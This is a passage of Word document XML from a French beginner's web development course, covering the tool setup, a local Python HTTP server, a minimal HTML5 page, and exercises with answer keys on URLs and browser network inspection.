        <w:t>Un éditeur de texte</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> conçu pour le code. Visual Studio Code est le plus répandu ; Sublime Text, Neovim ou WebStorm conviennent également. N'utilisez pas un traitement de texte : il insère une mise en forme invisible qui corrompt le HTML.</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b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un navigateur récent</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> avec ses outils de développement intégrés (F12). Chrome, Edge et Firefox offrent tous un inspecteur, une console, un onglet réseau et un onglet performance.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b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un terminal</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> : Bash sous Linux et macOS, PowerShell ou WSL sous Windows. Les commandes de ce cours fonctionnent dans Bash.</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b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un dossier de projet</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> unique, sans espaces ni accents dans le nom, par exemple </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>mon-site</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Une arborescence simple, lisible et durable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mon-site/</w:t>
        <w:br/>
        <w:t>├── index.html</w:t>
        <w:br/>
        <w:t>├── css/</w:t>
        <w:br/>
        <w:t>│   └── style.css</w:t>
        <w:br/>
        <w:t>├── js/</w:t>
        <w:br/>
        <w:t>│   └── app.js</w:t>
        <w:br/>
        <w:t>└── images/</w:t>
        <w:br/>
        <w:t xml:space="preserve">    └── logo.svg</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Cette organisation n'est pas une convention arbitraire : elle sépare les responsabilités, facilite les liens relatifs et prépare le travail avec des outils de construction. Nous la retrouverons à chaque chapitre.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>1.6 Servir une page en local</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Il est tentant de double-cliquer sur un fichier HTML. Le navigateur l'ouvre alors avec le schéma </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>file://</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>. Cela suffit pour une page isolée, mais plusieurs fonctionnalités échouent : chargement de modules JavaScript, requêtes vers une API, certains accès au stockage. Il faut servir le dossier par HTTP.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Pour la première page de ce cours, créez </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>index.html</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> et démarrez un serveur local. Python fournit un serveur prêt à l'emploi, sans installation supplémentaire sur la plupart des systèmes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Démarrer un serveur HTTP local dans le dossier du projet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cd mon-site</w:t>
        <w:br/>
        <w:t>$ python3 -m http.server 8000</w:t>
        <w:br/>
        <w:t>Serving HTTP on 0.0.0.0 port 8000 ...</w:t>
        <w:br/>
        <w:t>127.0.0.1 - - [19/Oct/2026 10:12:04] "GET / HTTP/1.1" 200 -</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Ouvrez ensuite </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>http://localhost:8000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. L'adresse </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>localhost</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> désigne votre propre machine ; le port 8000 identifie le programme qui écoute. Sous Visual Studio Code, l'extension Live Server produit le même effet avec un rechargement automatique.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Le squelette minimal d'une page HTML5 valide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&lt;!doctype html&gt;</w:t>
        <w:br/>
        <w:t>&lt;html lang="fr"&gt;</w:t>
        <w:br/>
        <w:t>&lt;head&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;meta charset="utf-8"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;meta name="viewport" content="width=device-width, initial-scale=1"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;title&gt;Mon premier site&lt;/title&gt;</w:t>
        <w:br/>
        <w:t>&lt;/head&gt;</w:t>
        <w:br/>
        <w:t>&lt;body&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;h1&gt;Bonjour, Web&lt;/h1&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;p&gt;Cette page est servie par HTTP, dans un navigateur.&lt;/p&gt;</w:t>
        <w:br/>
        <w:t>&lt;/body&gt;</w:t>
        <w:br/>
        <w:t>&lt;/html&gt;</w:t>
      </w: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VÉRIFIER QUE TOUT FONCTIONNE</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Si la page s'affiche mais que l'adresse commence par </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>file://</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>, vous avez ouvert le fichier directement. Si le navigateur affiche un message d'erreur, vérifiez que le serveur tourne toujours dans le terminal et que le port n'est pas déjà utilisé par un autre programme.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>1.7 Ce que vous allez apprendre, et dans quel ordre</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>La suite du cours suit une progression volontairement linéaire. Les chapitres 2 à 8 construisent des documents HTML solides : structure, texte, liens, médias, tableaux, formulaires. Les chapitres 9 à 16 introduisent CSS et la mise en forme. Les chapitres 17 à 23 traitent la mise en page contemporaine et l'accessibilité. Les chapitres 24 à 31 ajoutent JavaScript et l'interactivité. Les chapitres 32 à 36 terminent par la qualité, la performance, la sécurité et un projet complet.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:pBdr>
          <w:left w:val="single" w:sz="16" w:space="7" w:color="E0A21B"/>
        </w:pBdr>
        <w:spacing w:before="120" w:after="180" w:line="310" w:lineRule="exact"/>
        <w:ind w:left="510" w:right="227"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Le Web est plus une invention sociale qu'une invention technique.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  — Tim Berners-Lee</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Cette phrase rappelle l'essentiel : un site n'existe que par ses lecteurs. La technique sert la lecture, la navigation et l'accès, jamais l'inverse. Gardez ce critère en tête pour arbitrer tous les choix de ce cours.</w:t>
      </w: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Internet est l'infrastructure ; le Web est un service bâti sur HTTP, les URL et HTML.</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chargement de page enchaîne DNS, connexion, requête, réponse, analyse et rendu.</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HTML décrit le sens, CSS la présentation, JavaScript le comportement.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client ne peut rien garder de secret : toute validation doit être reprise côté serveur.</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serveur local évite les limites du schéma file://.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tolérance du Web rend le début facile, mais la qualité exige de la rigueur.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Vous savez maintenant ce qui se passe entre l'adresse saisie et la page affichée. Le chapitre suivant installe un poste de travail complet et durable : éditeur configuré, navigateur maîtrisé, terminal apprivoisé.</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1.1 — Décomposer une URL</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 xml:space="preserve">On considère l'adresse suivante : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>https://www.exemple.fr:8443/blog/article-12?page=2&amp;tri=date#commentaires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Identifiez le schéma, l'hôte, le port, le chemin, la chaîne de requête et l'ancre.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Indiquez lesquels de ces éléments sont envoyés au serveur dans une requête HTTP.</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Proposez une URL équivalente sans port explicite, en expliquant votre choix.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Indice.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Le port par défaut dépend du schéma : 80 pour HTTP, 443 pour HTTPS.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 1.2 — Observer un chargement</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Ouvrez les outils de développement de votre navigateur, onglet Réseau, puis rechargez une page d'un site d'actualités.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Repérez le document HTML principal et notez son code de statut.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Comptez le nombre de ressources chargées et identifiez les trois plus lourdes.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Notez le temps total de chargement et proposez une cause probable des ralentissements.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Indice.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Triez la liste par taille décroissante : le diagnostic devient immédiat.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 1.3 — Écrire et servir sa première page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 xml:space="preserve">Créez un dossier </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>mon-site</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> contenant un fichier </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>index.html</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> valide, avec un titre d'onglet, un titre principal et un paragraphe.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Écrivez le document avec l'encodage UTF-8 et la langue française.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Démarrez un serveur local sur le port 8000.</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dans l'onglet Réseau que la page est bien servie en HTTP 200.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:tabs>
          <w:tab w:pos="425" w:val="left"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="60" w:line="348" w:lineRule="exact"/>
        <w:ind w:left="425" w:hanging="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>4.</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Modifiez le paragraphe puis rechargez : le changement doit apparaître.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Indice.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Le serveur doit être lancé depuis le dossier qui contient index.html.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 1.4 — Comparer deux sites</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">   ANALYSE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Choisissez un site institutionnel et un site d'information. Analysez-les avec les outils de développement.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Comparez le nombre de requêtes et le poids total.</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Identifiez trois différences de structure HTML (hiérarchie des titres, navigation, formulaires).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Rédigez une conclusion de dix lignes sur les compromis observés.</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1.1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Schéma</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>https</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Hôte</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>www.exemple.fr</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (le port par défaut de HTTPS est 443 ; 8443 est un port alternatif). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Chemin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>/blog/article-12</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Chaîne de requête</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>page=2&amp;tri=date</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Ancre</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>commentaires</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le serveur reçoit le chemin et la chaîne de requête dans la ligne de requête. L'ancre n'est jamais transmise : elle est traitée localement par le navigateur pour faire défiler le document.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>https://www.exemple.fr/blog/article-12?page=2&amp;tri=date</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> suffit si le service écoute sur le port standard 443. Supprimer un port explicite n'est possible que si le serveur est configuré sur ce port ; dans le cas contraire, l'URL ne répond plus.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 1.2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le document principal apparaît en première ligne, avec un statut 200 s'il est trouvé, 301 ou 302 s'il y a redirection, 404 s'il manque.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le nombre de ressources varie fortement d'un site à l'autre (souvent 40 à 150). Les plus lourdes sont généralement des images, des polices ou des scripts tiers.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
